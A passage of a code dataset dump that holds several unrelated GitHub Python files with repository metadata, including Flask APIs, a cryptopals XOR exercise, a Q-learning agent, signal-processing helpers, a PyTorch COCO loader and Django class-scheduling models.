questions[random.randint(0, len(questions)-1)]\n\n return jsonify({\n 'success': True,\n 'question': new_questions.format()\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"page not found\"\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(400)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"bad request\"\n }), 404\n\n @app.errorhandler(405)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 405,\n \"message\": \"method not allowed\"\n }), 405\n\n return app\n","repo_name":"noha99/Trivia_API","sub_path":"trivia/backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18051805801","text":"#! /usr/bin/env python3\n\nimport argparse\nimport logging\nimport tqdm\n\nimport requests\nimport pywikibot\nimport pywikibot.proofreadpage\n\nimport utils.range_selection\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='show debugging information')\n parser.add_argument('-i', '--index',\n help='Index name')\n parser.add_argument('-p', '--pages', nargs='+',\n help='the pages to fetch')\n\n args = parser.parse_args()\n\n site = pywikibot.Site('en', 'wikisource')\n\n log_level = logging.DEBUG if args.verbose else logging.INFO\n logging.basicConfig(level=log_level)\n\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"requests_oauthlib\").setLevel(logging.WARNING)\n logging.getLogger(\"oauthlib\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n index = pywikibot.proofreadpage.IndexPage(site, 'Index:' + args.index)\n\n if args.pages:\n pages = utils.range_selection.get_range_selection(\n args.pages, index.num_pages)\n else:\n pages = range(1, index.num_pages + 1)\n\n for i in tqdm.tqdm(pages):\n w = 1024\n img_page = pywikibot.FilePage(site, 'File:' + args.index)\n img_url = img_page.get_file_url(url_param=f'page{i}-{w}px')\n\n url = \"https://ocr.wmcloud.org/api.php\"\n\n params = {\n 'engine': 'tesseract',\n 'langs[]': 'en',\n 'image': img_url,\n 'uselang': 'en'\n }\n\n requests.get(url, data=params)\n logging.debug(params)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"inductiveload/wstools","sub_path":"wstools/prod_ocr.py","file_name":"prod_ocr.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19102503703","text":"from flask import request, Blueprint\nfrom werkzeug.exceptions import (\n BadRequest,\n Conflict,\n NotFound\n)\nfrom app.libs.api_response import ApiResponse\nfrom app.libs.jwt_handler import api_required\nfrom app.model.item import Item, ItemSearchOption\nfrom app.model.mapper.item_mapper import ItemMapper\n\n\nbp = Blueprint('item', __name__, url_prefix='/api/items')\n\n\n@bp.route('/', methods=['GET'])\n@api_required\ndef index():\n option = ItemSearchOption()\n if request.args is not None:\n option.category_id = request.args.get('category_id', type=int)\n option.q = request.args.get('q', type=str)\n\n mapper = ItemMapper()\n items = mapper.find(option)\n\n return ApiResponse(200, data={'items': items})\n\n\n@bp.route('/', methods=['POST'])\n@api_required\ndef add():\n request_data = request.get_json()\n if request_data is None:\n raise BadRequest()\n\n item = Item(**request.json)\n if not item.is_valid():\n raise BadRequest(\n description='保存エラー。エラー内容を確認してください。',\n response=item.validation_errors\n )\n\n mapper = ItemMapper()\n saved = mapper.save(item)\n if not saved:\n raise Conflict()\n\n return ApiResponse(201, message='保存しました')\n\n\n@bp.route('/', methods=['PUT'])\n@api_required\ndef edit(id):\n request_data = request.get_json()\n if request_data is None:\n raise BadRequest()\n\n item = Item(**request.json)\n if not item.is_valid():\n raise BadRequest(\n description='保存エラー。エラー内容を確認してください。',\n response=item.validation_errors\n )\n\n mapper = ItemMapper()\n saved = mapper.save(item)\n if not saved:\n raise Conflict()\n\n return ApiResponse(200, message='更新しました')\n\n\n@bp.route('/', methods=['DELETE'])\n@api_required\ndef delete(id):\n mapper = ItemMapper()\n deleted = mapper.delete(id)\n if not deleted:\n raise NotFound(description='リクエストデータはすでに削除されたか、または存在しません。')\n\n return ApiResponse(204, '削除しました')\n","repo_name":"KentaYamada/siphon","sub_path":"app/controller/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29361797819","text":"# 2. Fixed XOR - http://cryptopals.com/sets/1/challenges/2\n\n# Write a function that takes two equal-length buffers and produces their XOR combination.\n\nimport binascii\n\ndef XORME(x,y):\n # unhexing both the strings\n h1 = binascii.unhexlify(x)\n h2 = binascii.unhexlify(y)\n\n return binascii.hexlify(bytes(a ^ b for a, b in zip(h1, h2))) # XOR in Python3\n\nx = input(\"Enter String 1: \")\ny = input(\"Enter String 2: \")\n\nprint(\"\\nXOR of String 1 and String 2: \",XORME(x,y).decode(\"utf-8\")) # calling func w/ pretty print\n","repo_name":"jatinkrmalik/the-cryptopals-crypto-challenges-solution","sub_path":"SET 1/01x02.py","file_name":"01x02.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26348344192","text":"import numpy as np\nfrom collections import defaultdict\n\nclass Agent:\n\n def __init__(self, nA=6):\n \"\"\" Initialize agent.\n\n Params\n ======\n - nA: number of actions available to the agent\n \"\"\"\n self.nA = nA\n self.Q = defaultdict(lambda: np.zeros(self.nA))\n self.alpha = .09\n self.gamma = 1.0\n\n def select_action(self, state,i_episode):\n \"\"\" Given the state, select an action.\n\n Params\n ======\n - state: the current state of the environment\n\n Returns\n =======\n - action: an integer, compatible with the task's action space\n \"\"\"\n epsilon = 1.0/i_episode\n policy_s = np.ones(self.nA)*epsilon/self.nA\n policy_s[np.argmax(self.Q[state])] = 1 - epsilon + (epsilon / self.nA)\n \n action = np.random.choice(np.arange(self.nA), p =policy_s)\n \n \n return action\n\n def step(self, state, action, reward, next_state, done):\n \"\"\" Update the agent's knowledge, using the most recently sampled tuple.\n\n Params\n ======\n - state: the previous state of the environment\n - action: the agent's previous choice of action\n - reward: last reward received\n - next_state: the current state of the environment\n - done: whether the episode is complete (True or False)\n \"\"\"\n self.Q[state][action] += self.alpha*(reward +(self.gamma*(np.max(self.Q[next_state]))- self.Q[state][action]))\n \n \n \n \n \n #self.Q[state][action] += 1","repo_name":"Ujwal2910/Smart-Traffic-Signals-in-India-using-Deep-Reinforcement-Learning-and-Advanced-Computer-Vision","sub_path":"Traffic Modeling Real Vision Based/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"53"} +{"seq_id":"3555422741","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom scipy import signal\n\n# matplotlib.use('Agg')\n# matplotlib.pyplot.ioff()\nfrom numpy import sin, linspace, pi\nfrom pylab import plot, show, title, xlabel, ylabel, subplot\nfrom scipy import fft, arange\nfrom scipy.signal import butter, lfilter, freqz\n\n\ndef plot_frequency(data):\n Fs = 8000\n f = 5\n sample = 8000\n x = np.arange(sample)\n data = np.sin(2 * np.pi * f * x / Fs)\n plt.plot(x, data)\n signal_spectrum = (np.fft.fft(data))\n time_step = 1 / 30\n freqs = (np.fft.fftfreq(signal_spectrum.size, d=time_step))\n plt.plot(freqs, np.abs(signal_spectrum))\n\n\ndef plot_power(x_k):\n ps = np.abs(x_k) ** 2\n time_step = 1 / 30\n freqs = np.fft.fftfreq(x_k.size, time_step)\n idx = np.argsort(freqs)\n plot(freqs[idx], ps[idx])\n\n\ndef plot_spectrum(y, fs, extitle=None, path_to_save=''):\n \"\"\"\n Plots a Single-Sided Amplitude Spectrum of y(t)\n \"\"\"\n n = len(y) # length of the signal\n cut = np.floor(n / 2).astype(int)\n Y = abs(fft(y)) # fft computing and normalization\n Y = Y[0:cut] / cut\n if extitle is None:\n extitle = ''\n\n title('Frequency Spectrum of the signal %s' % (str(extitle)))\n dk = 1 / n\n freq = linspace(0, 0.5 - dk, cut) * fs\n plt.clf()\n plt.plot(freq, Y, 'r') # plotting the spectrum\n xlabel('Freq (Hz)')\n ylabel('|Y(freq)|')\n axes = plt.gca()\n axes.set_ylim([0, Y.max()])\n axes.set_xlim([0, 2000])\n plt.show()\n # plt.savefig('%s/Frequency Spectrum of the signal %s' % (path_to_save, str(extitle)) + '.png', bbox_inches='tight')\n\n\ndef plot_time(y, fs, extitle=None, path_to_save=''):\n n = len(y) # length of the signal\n T = n / fs\n t = np.linspace(0, T, n, endpoint=False)\n if extitle is None:\n extitle = ''\n\n title('Time Domain of the signal %s' % (str(extitle)))\n plt.clf()\n plt.plot(t, y)\n xlabel('Time')\n ylabel('Amplitude')\n plt.show()\n # plt.savefig('%s/Time Domain of the signal %s' % (path_to_save, str(extitle)) + '.png', bbox_inches='tight')\n\n\ndef plot_spectrogram(x_t, fs, xtitle=None, path_to_save=None):\n # plt.clf()\n # plt.specgram(x_t, NFFT=len(x_t), noverlap=0, Fs=fs, window=matplotlib.mlab.window_none)\n # plt.ylabel('Frequency [Hz]')\n # plt.xlabel('Time [sec]')\n # # plt.title(title)\n # plt.show()\n\n frequencies, times, spectrogram = signal.spectrogram(x_t, fs)\n plt.clf()\n title('Spectrogram of the signal %s' % (str(xtitle)))\n plt.pcolormesh(times, frequencies, spectrogram)\n plt.imshow(spectrogram)\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n plt.show()\n\n # plt.savefig('%s/Spectrogram of the signal %s' % (path_to_save, str(xtitle)) + '.png', bbox_inches='tight')\n pass\n\n\ndef plot_psd(x_t, fs, xtitle, path_to_save):\n f, Pxx_den = signal.periodogram(x_t, fs)\n plt.clf()\n plt.semilogy(f, Pxx_den)\n title('PSD of the signal %s' % (str(xtitle)))\n plt.xlabel('frequency [Hz]')\n plt.ylabel('PSD [V**2/Hz]')\n plt.show()\n pass\n\n\ndef plot_time_freq(x_t, fs, title='', path_to_save=None):\n return\n x_t = remove_dc(x_t, 100, 1400, fs)\n x_t = normalize(x_t)\n\n plot_time(x_t, fs, title, path_to_save)\n plot_spectrum(x_t, fs, title, path_to_save)\n plot_spectrogram(x_t, fs, title, path_to_save)\n plot_psd(x_t, fs, title, path_to_save)\n\n\ndef normalize(x_m, min=-1, max=1):\n # x_m -= np.mean(x_m)\n min = np.min(x_m)\n max = np.max(x_m)\n\n normalized_data = np.array([2 * (x - min) / (max - min) - 1 for i, x in enumerate(x_m)]).reshape(-1, )\n normalized_data -= np.mean(normalized_data) # Remove DC Component\n return normalized_data\n\n\ndef butter_bandpass(lowcut, highcut, fs, order=5):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = butter(order, [low, high], btype='band')\n return b, a\n\n\ndef remove_dc(data, lowcut, highcut, fs, order=5):\n b, a = butter_bandpass(lowcut, highcut, fs, order=order)\n y = lfilter(b, a, data)\n return y\n","repo_name":"Jasemalsadi/AsthmaPrediction","sub_path":"core_code/Feature_Extraction/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71442388969","text":"# print all prime number in interval\n\ndef prime(x,y):\n prime_list = []\n for i in range(x,y):\n if i==0 or i==1:\n break\n else:\n for j in range(2,int(i/2)+1):\n if i % j == 0:\n break\n else:\n prime_list.append(i)\n return prime_list\n\nstarting_range = 2\nending_range = 10\nlst = prime(starting_range, ending_range)\n\nif len(lst) == 0:\n print(\"There are no prime number\")\nelse:\n print(\"There are prime number\",lst)","repo_name":"smitjogani/python","sub_path":"feb/feb25.py","file_name":"feb25.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32301561631","text":"# -*- coding:utf-8 -*-\n\n# ---------------------------------------------\n# @file test_yml.py\n# @description test_yml\n# @author WcJun\n# @date 2021/07/15\n# ---------------------------------------------\nimport os\n\nimport pytest\nimport requests\n\nfrom src.main.python.util.yml_reader import YmlReader\n\n# yaml_directory_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\nyml_path = os.path.join(os.getcwd() + '{}src{}main{}resources{}test_yml.yml'.format(os.sep, os.sep, os.sep, os.sep))\nreader = YmlReader(yml_path)\ncontent = reader.read_yml()\n\n\nclass TestRefreshAccessToken:\n \"\"\"\n refresh access token\n \"\"\"\n\n @pytest.mark.parametrize('context', content)\n def test_refresh_access_token(self, context):\n \"\"\"\n do refresh access token\n \"\"\"\n url = context['request']['url']\n parameters = context['request']['parameters']\n response = requests.get(url=url, params=parameters)\n print(response.text)\n","repo_name":"photowey/pytest-in-action","sub_path":"src/main/python/testyml/test_yml.py","file_name":"test_yml.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40916496495","text":"from abc import ABCMeta, abstractmethod, ABC\r\n\r\nfrom file_loader import PandasLoader\r\nfrom settings import logger\r\n\r\n\r\nclass ISchedule(ABC):\r\n __metaclass__ = ABCMeta\r\n\r\n @abstractmethod\r\n def get_schedule_str(self, day: str) -> str:\r\n raise NotImplementedError\r\n\r\n\r\nclass PandasSchedule(ISchedule):\r\n def __init__(self, filename: str, course: str, group: str):\r\n self.schedule = PandasLoader().get_excel(filename, course)\r\n self.group_num = int(group[-1])\r\n self.day_case = {\r\n \"понедельник\": \"понедельник\",\r\n \"вторник\": \"вторник\",\r\n \"среда\": \"среду\",\r\n \"четверг\": \"четверг\",\r\n \"пятница\": \"пятницу\",\r\n \"суббота\": \"субботу\"}\r\n self.days = list(self.day_case.keys())\r\n\r\n def get_schedule_str(self, day: str) -> str:\r\n if self.schedule is None:\r\n return \"Произошла ошибка на сервере, расписание недоступно\"\r\n day_sch = f\"Расписание на {self.day_case[day]}\\n\"\r\n max_pairs_in_day = 8\r\n for i in range(self.days.index(day) * max_pairs_in_day + 1, (self.days.index(day) + 1) * max_pairs_in_day):\r\n time = str(self.schedule[self.schedule.columns[1]].tolist()[i])\r\n cell_value = str(self.schedule[self.schedule.columns[self.group_num + 1]].tolist()[i]).split('\\\\')\r\n if len(cell_value) == 1 and cell_value[0] == \"nan\":\r\n day_sch += f\"\\n⌚{time}⌚\\nНет пары\\n\"\r\n elif len(cell_value) != 5:\r\n logger.warning(\"get_schedule_str(): the number of fields is not correct, check schedule file\")\r\n day_sch += f\"\\n⌚{time}⌚\\nError\\n\"\r\n else:\r\n subj, pair_type, teacher, audi, form = cell_value\r\n day_sch += \\\r\n (f\"\\n⌚{time}⌚\\n\" +\r\n f\"{subj}\\n\" +\r\n f\"{pair_type}\\n\" +\r\n f\"Преподаватель: {teacher}\\n\" +\r\n f\"Аудитория: {audi}\\n\" +\r\n f\"Форма проведения: {form}\\n\")\r\n return day_sch\r\n","repo_name":"letimofeev/falt-bot-12","sub_path":"version2/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30041006721","text":"from torchvision.datasets import CocoDetection\nfrom torchvision.transforms import v2\nfrom torch.utils.data import DataLoader\nimport torch\nfrom utils.Datautil import custom_collate_fn, convert_coco_format_to_pascal_voc\n\n\nclass CustomCocoDataset(CocoDetection):\n \"\"\"\n A custom dataset class derived from PyTorch's CocoDetection class, tailored for handling both detection and\n segmentation tasks using the COCO dataset format. It extends the standard COCO dataset functionality by\n allowing custom transformations and handling different tasks like detection and segmentation.\n\n Attributes:\n task (str): Indicates the type of task ('detection' or 'segmentation').\n transform (callable, optional): A function/transform that takes in an image and returns a transformed version.\n \"\"\"\n\n def __init__(self, root, ann_file, task='detection', transform=None):\n \"\"\"\n Initialize the dataset.\n\n Parameters:\n root (str): Directory where images are located.\n ann_file (str): Path to COCO annotation file.\n task (str): Task type - 'detection' or 'segmentation'.\n transform (callable, optional): Optional transform to be applied on a sample.\n \"\"\"\n super(CustomCocoDataset, self).__init__(root, ann_file)\n self.task = task\n self.transform = transform\n\n def __len__(self):\n \"\"\"\n Return the number of items in the dataset.\n\n Returns:\n int: Total number of items in the dataset.\n \"\"\"\n return len(self.ids) # `ids` is a list of annotation IDs, part of CocoDetection\n\n def __getitem__(self, idx):\n \"\"\"\n Get an item from the dataset.\n\n Parameters:\n idx (int): Index of the item.\n\n Returns:\n tuple: (image, target) where target depends on the task.\n \"\"\"\n img, annotations = super(CustomCocoDataset, self).__getitem__(idx)\n # Initialize containers for bbox, labels, and (if needed) masks\n boxes = []\n labels = []\n masks = [] # Only used if task is 'segmentation'\n image_id = annotations[0]['image_id'] if annotations else -1\n img_w, img_h = img.size\n\n for ann in annotations:\n # Extract label\n labels.append(ann['category_id'])\n # Extract bounding box\n boxes.append(ann['bbox'])\n\n if self.task == 'segmentation':\n # Extract segmentation mask\n masks.append(ann['segmentation'][0])\n\n converted_box = convert_coco_format_to_pascal_voc(torch.as_tensor(boxes, dtype=torch.float32))\n if self.transform:\n img, converted_box = self.transform(img, converted_box)\n\n new_target = {\n 'boxes': converted_box,\n 'labels': torch.as_tensor(labels, dtype=torch.int64),\n 'image_id': torch.tensor([image_id]) # Encapsulate image_id in a tensor\n }\n\n if self.task == 'segmentation':\n new_target['masks'] = torch.as_tensor(masks, dtype=torch.float32)\n\n return img, new_target\n\n @staticmethod\n def get_transform(base_data, train=True):\n \"\"\"\n Returns a composed transform function.\n\n Parameters:\n base_data (str): The dataset that pretrained model is originally trained with.\n train (bool): Flag to indicate if the transform is for training or validation.\n\n Returns:\n A transform function composed of several individual transforms.\n \"\"\"\n pretrained_pixel_stats = {'imagenet': {'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}\n }\n norm_mean = pretrained_pixel_stats[base_data]['mean']\n norm_std = pretrained_pixel_stats[base_data]['std']\n\n if train:\n # Example of adding more transforms for training\n return v2.Compose([\n v2.Resize(1024),\n v2.RandomHorizontalFlip(),\n v2.RandomRotation(15),\n v2.ToTensor(),\n v2.Normalize(mean=norm_mean, std=norm_std)\n ])\n else:\n # Transforms for validation/testing\n return v2.Compose([\n v2.Resize(1024),\n v2.ToTensor(),\n v2.Normalize(mean=norm_mean, std=norm_std)\n ])\n\n\ndef create_data_loader(dataset_path, base_data, task, annotation_file, batch_size, train=True):\n \"\"\"\n Creates a data loader for the CustomCocoDataset.\n\n Parameters:\n dataset_path (str): Path to the dataset directory.\n base_data (str): The dataset that pretrained model is originally trained with.\n task (str): Tge cv task from which the ground truths are extracted\n annotation_file (str): Path to the annotation file.\n batch_size (int): Batch size for the data loader.\n train (bool): Flag indicating training or validation loader.\n\n Returns:\n DataLoader: A PyTorch DataLoader object.\n \"\"\"\n dataset = CustomCocoDataset(root=dataset_path,\n ann_file=annotation_file,\n task=task,\n transform=CustomCocoDataset.get_transform(base_data, train))\n\n loader = DataLoader(dataset,\n batch_size=batch_size,\n shuffle=train,\n num_workers=4,\n collate_fn=custom_collate_fn)\n\n return loader\n","repo_name":"berkisler/lensor_damage_detection","sub_path":"src/dataset/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40975046988","text":"from unicodedata import name\n\n\n#Dictionary\n'''\nnameList = {\"name\": \"Alejandro\", \"lastName\": \"Ramos\"}\nitem = { \"_id\": \"1\", \"name\": \"Iphone 11\", \"category\": \"Smartphone\"}\n\n\nprint(nameList[\"name\"], \"\\n\", item[\"name\"])\n \nnameList[\"age\"] = 18\n\nprint(nameList[\"age\"], \"\\n\", item[\"name\"])\n\n'''\n#add to a dictionary\n'''\nfirstName = str(input(\"Whats your name? \"))\nlastName = str(input(\"Whats your last name? \"))\nage = int(input(\"Whats your age? \"))\njob = str(input(\"Whats your job? \"))\n\nperson = {}\n\nperson[\"name\"] = firstName\nperson[\"lastName\"] = lastName\nperson[\"age\"] = age\nperson[\"job\"] = job\n\nprint(person)\n\n'''\n\norderNumeric = {1: \"one\", 2: \"three\"}\nnewOrder = {2: \"two\"}\n\n# updates the value of key 2\norderNumeric.update(newOrder)\n\nprint(orderNumeric)\n\nnewOrder = {3: \"three\"}\n\n# adds element with key 3\norderNumeric.update(newOrder)\n\nprint(orderNumeric)\n\n","repo_name":"alejandrosilveiraramos/moreDevsTwoBlu","sub_path":"classes/module04/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45511947188","text":"import datetime\n\nfrom django.contrib.auth.models import AbstractUser, User\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\n\nfrom django.db.models import CASCADE\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.timezone import make_aware\n\nfrom accounts.models import UserProfile\nfrom studios.models import Studio\nfrom datetime import date\nimport pandas\nimport calendar\n\n\n# Create your models here.\nclass ClassSet(models.Model):\n studio = models.ForeignKey(to=Studio, on_delete=CASCADE, related_name='class_studio')\n name = models.CharField(max_length=200)\n description = models.CharField(max_length=200)\n coach = models.CharField(max_length=200)\n start = models.DateTimeField()\n end_time = models.TimeField()\n reoccur_until = models.DateField()\n capacity = models.PositiveIntegerField()\n\n def clean(self):\n if self.start is not None and self.end_time is not None:\n # Makes sure that the time is in the correct order\n if self.start.time() > self.end_time:\n raise ValidationError('Start time should be before end time')\n else:\n # Doesn't allow the user to input an invalid time\n raise ValidationError('Date Time Format is incorrect')\n # Makes sure that the days is in the correct order\n if self.start.date() > self.reoccur_until:\n raise ValidationError('Start day should be before end day')\n\n def __str__(self):\n return str(self.name)\n\n def delete(self, using=None, keep_parents=False):\n # Get today's date\n today = date.today()\n # Gets the range of dates between the start and end date\n date_range = pandas.date_range(today, self.reoccur_until, freq='D')\n # Gets the id of the class set\n class_set_ids = ClassSet.objects.filter(id=self.id)\n for set_id in class_set_ids:\n for a_date in date_range:\n try:\n # Deletes all future occurrences of the class\n start_date_time = datetime.datetime.combine(a_date, self.start.time())\n ClassSession.objects.get(name=set_id, start_date_time=start_date_time).delete()\n except:\n pass\n\n\n@receiver(post_save, sender=ClassSet)\ndef save_class(sender, instance, **kwargs):\n # Gets the first three letters of the weekday that the 1st day starts with\n day = calendar.day_name[instance.start.date().weekday()][:3]\n # Gets the range of dates between the start and end date\n date_range = pandas.date_range(instance.start.date(), instance.reoccur_until, freq=f'W-{day}')\n exists = ClassSession.objects.filter(name=instance)\n if exists:\n first_class = exists[0].start_date_time.date()\n last_class = exists[0].start_date_time.date()\n for a_class in exists:\n # Shortened duration\n if a_class.start_date_time.date() < instance.start.date():\n a_class.delete()\n if a_class.start_date_time.date() > instance.reoccur_until:\n a_class.delete()\n # Find the earliest class in the set\n if a_class.start_date_time.date() < first_class:\n first_class = a_class.start_date_time.date()\n # Find the last class in the set\n if a_class.start_date_time.date() > last_class:\n last_class = a_class.start_date_time.date()\n # Update all fields\n a_class.name = instance\n a_class.description = instance.description\n a_class.coach = instance.coach\n a_class.save()\n # Extends the start date\n if first_class > instance.start.date():\n new_start_range = pandas.date_range(instance.start.date(),\n first_class - datetime.timedelta(days=1), freq=f'W-{day}')\n create_class(instance, new_start_range)\n # Extends the end date\n if last_class < instance.reoccur_until:\n new_end_range = pandas.date_range(last_class + datetime.timedelta(days=1),\n instance.reoccur_until, freq=f'W-{day}')\n create_class(instance, new_end_range)\n else:\n print('int')\n # Creates a class session for each date\n create_class(instance, date_range)\n\n\ndef create_class(instance, date_range):\n for date in date_range:\n class_session = ClassSession.objects.create(\n name=instance,\n description=instance.description,\n coach=instance.coach,\n start_date_time=datetime.datetime.combine(date, instance.start.time()),\n end_time=instance.end_time,\n enrolled=0\n )\n class_session.save()\n\n\nclass ClassSession(models.Model):\n name = models.ForeignKey(to=ClassSet, on_delete=CASCADE, related_name='class_name')\n description = models.CharField(max_length=200)\n coach = models.CharField(max_length=200)\n start_date_time = models.DateTimeField()\n end_time = models.TimeField()\n enrolled = models.PositiveIntegerField(default=0)\n\n def __str__(self):\n return str(f'{self.name} -- {self.start_date_time.date()}')\n\n\nclass Keyword(models.Model):\n classSession = models.ForeignKey(to=ClassSession, on_delete=CASCADE)\n word = models.CharField(max_length=200)\n\n def __str__(self):\n return self.word\n\n\nclass EnrolledUser(models.Model):\n user = models.ForeignKey(to=UserProfile, on_delete=models.CASCADE)\n class_session = models.ForeignKey(to=ClassSession, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(f'{self.user.first_name} -- {self.class_session}')\n","repo_name":"pritheeroy/toronto_fitness_club","sub_path":"PF/back-end/classes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19552876947","text":"import os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\ndef main():\n \n f = open(\"books.csv\")\n reader = csv.reader(f)\n for isbn,title,author,year in reader:\n db.execute(\"INSERT INTO books(isbn,title,author,year) VALUES(:isbn, :title, :author, :year)\", {\"isbn\": isbn, \"title\": title, \"author\": author, \"year\": year})\n print(\"Addin book from {author}....\" )\n db.commit()\n\nif __name__ ==\"__main__\":\n main()\n","repo_name":"aliyumuhammad01/CS50-project1","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9398277552","text":"#%% template\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 18 11:32:11 2019\n\n@author: ibahadiraltun\n\"\"\"\n\nimport collections\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport glob\nimport sys\nimport os\n\nDIR_PATH = os.getcwd()\nPATH = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/'\npath_to_vectors = [PATH + 'categories/', PATH + 'named_entity/', PATH + 'part_of_speech/', PATH + 'bigram/']\n\ncolumns = ['linenumber', 'speaker', 'text', 'label']\ntrain_files = []\ntest_files = []\nbigram_list = []\nmp = collections.defaultdict()\nvec_all = np.zeros((0, 0))\nvec_cnt = 0\n\ndef read_files():\n for file in glob.glob(\"../test/*.tsv\"): test_files.append(file)\n for file in glob.glob(\"../training/tsv_data/*.tsv\"): train_files.append(file)\n print('------\\n', train_files, ' \\n\\n-----\\n')\n run_algo()\n\ndef save_y_train_vector(vec):\n fpath = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/y_train.txt'\n np.savetxt(fpath, vec, fmt = '%f')\n\ndef save_X_train_vector(vec):\n fpath = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/X_train.txt'\n np.savetxt(fpath, vec, fmt = '%f')\n\ndef save_X_test_vector(fname, vec):\n fpath = '/Users/ibahadiraltun/Desktop/CLEF-2019-CheckThat/CLEF2019_Task1/data/submissions/solution_cont1/vectors/X_test/' + fname\n np.savetxt(fpath, vec, fmt = '%f')\n\ndef run_algo():\n for file in test_files:\n fname = file.split('/')[2]\n vec_prev = np.loadtxt('X_test/' + fname, dtype = 'f')\n vec_speaker = np.loadtxt('speakers/test/' + fname, dtype = 'f')\n vec_cur = np.concatenate((vec_prev, vec_speaker), axis = 1)\n save_X_test_vector(fname, vec_cur)\n vec_all = np.zeros((0, 33))\n for file in train_files:\n fname = file.split('/')[3]\n vec = np.loadtxt('speakers/train/' + fname, dtype = 'f')\n vec_all = np.concatenate((vec_all, vec), axis = 0)\n vec_prev = np.loadtxt('X_train.txt', dtype = 'f')\n vec_cur = np.concatenate((vec_prev, vec_all), axis = 1)\n save_X_train_vector(vec_cur)\n return None\n\nif __name__ == '__main__':\n read_files()","repo_name":"ibahadiraltun/CLEF-2019","sub_path":"CLEF2019_Task1/data/submissions/solution_cont1/vectors/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35850026748","text":"pessoa = []\r\ndados = []\r\nmaior = menor = 0\r\nwhile True:\r\n dados.append(input(\"Nome: \"))\r\n dados.append(float(input('Peso: ')))\r\n if len(pessoa) == 0:\r\n maior = menor = dados[1]\r\n else:\r\n if dados[1] > maior:\r\n maior = dados[1]\r\n if dados[1] < menor:\r\n menor = dados[1]\r\n\r\n pessoa.append(dados[:])\r\n dados.clear()\r\n parar = input('Deseja continuar? [S/N]').upper().strip()\r\n while parar != 'S' and parar != 'N':\r\n parar = input('Deseja continuar? [S/N]').upper().strip()\r\n if parar == 'N':\r\n break\r\nprint(f'Ao todo, você cadastrou 